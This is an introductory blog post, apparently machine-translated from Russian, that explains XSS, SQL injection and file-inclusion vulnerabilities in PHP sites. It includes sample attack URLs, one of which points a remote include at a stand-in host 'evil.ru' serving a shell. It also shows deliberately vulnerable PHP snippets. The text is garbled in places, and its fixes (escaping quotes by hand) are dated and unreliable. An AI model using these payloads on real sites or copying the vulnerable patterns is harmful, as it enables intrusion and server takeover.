13:00 Security of webbased application | |
Introduction.Developing a website in php, I began to think about his safety. Web security. I would not like that one fine morning I saw on the website inscription «Hacked by% hackername%» on a white background or to the entire contents of my site, including the engine, for writing which took a long time, got someone else. Variety web-vulnerabilities. So, I became interested in the vulnerabilities and, of course, ways to address them. Basically, all vulnerabilities are classified into several types: 1) XSS attack a) Passive XSS b) Active XSS 2) SQL-injection 3) Inkludy a) Local b) Deleted reconnaissance.Consider a little bit more each of them. XSS-attackXSS means Cross Site scripting (XSS). Since the acronym CSS occupied by Cascading Style Sheets, then isolzuyut abbreviation is XSS, but not CSS. This vulnerability allows malicious Javascript code "no demand" user by inserting it into the html code for your site. XSS can be divided into passive and active. Active XSS - malicious code is stored in the database / file and directly displayed on a vulnerable site in your browser. For example, in message headers, body positions, etc. Passive XSS - malicious code passed to GET \ POST parameter and displayed on pages stored on the server is not happening. For example: site.ru / page.php? Var = <script> alert (/ hack /) </ script> If the variable var not filtered and is directly displayed on the page then when coming to this link the user will see a pop-up message here. Or the attacker gets his cookies, making a specific request. All XSS-vulnerability can create a link podbrsit administrator / user of the site and get his own cookies. These vulnerabilities have been even at many large sites - such as Vkontakte, for example, (article with vulnerabilities vkontakte were here, Habre). Solution: do htmlspecialchars fields, where necessary, brutally filter all html tags. SQL-injectionSQL-injection (injection, inject) - rznovidnost vulnerability that allows to substitute and topolnit original sql-question their data that modet lead to the conclusion of any information, or worse - full access to server. Example vulnerable code: ... $ id = $ _GET ['id']; $ query = "SELECT * FROM articles WHERE id ='".$ id." '; $ ret = mysql_query ($ query); ... Red and marked fragile line. If an attacker getom transmit, for example, znaechnie $ id = 13 ', the quote is inserted into a query that will cause an error and will take any data from database. (How to consider not going out of certain motives). Also, when nekotoyrh circumstances, an attacker can execute Even php code, which can lead to very tragic consequences. How to resolve the vulnerability: 1) The most-most importantly - filter the quotes. Everywhere - in the $ _GET, $ _POST, and even $ _COOKIES For example, replace "'" to "\'" 2) Do not ispolzoat a query such constructions: ... where id = $ id ..., but use ... where id = '$ id' with the filtered pre-quotes. InkludyInkludy - the type of vulnerabilities for which there exists the possibility to withdraw the contents of a particular server or faylana insert the contents of the file from another serveravnutr site. Local inkludy - inkludy under which it is possible to display only the contents of any files, but within a given server. Maybe ispolzoatsya for configuration files and then access the admin panel or even a database. Deleted inkludy - vulnerabilities that an attacker can request a specific print the contents of the files from a site within a given. With this an attacker could insert a malicious script, for example, shell (script to manage all files on the server, like ftp from web shell) and get access to the entire server. Example vulnerable code: site.ru / index.php? page = main.html Such an innocuous request to withdraw the contents of the file on the page main.html site. but an attacker could execute such a query: site.ru / index.php? page = http://evil.ru/shellcode.php and gain access to the entire server, this is and will be removed inkludom .* * for this requires some server settings. In the absence of the necessary settings, this inklud becomes local and can display the contents of any file server. ... $ page = $ _GET ['page']; include ($ page); ... result.Of course, it's not all the vulnerabilities that exist in the web-apps, but I have considered only the most important, in my opinion. Live examples of sites with vulnerabilities I will not lead to avoid trouble, but I think everything is clear. Whilst themed blog post I can not but hope for your possible help. moved to "Information Security", all thanks. (c) Ya | |
|
| |
| Total comments: 0 | |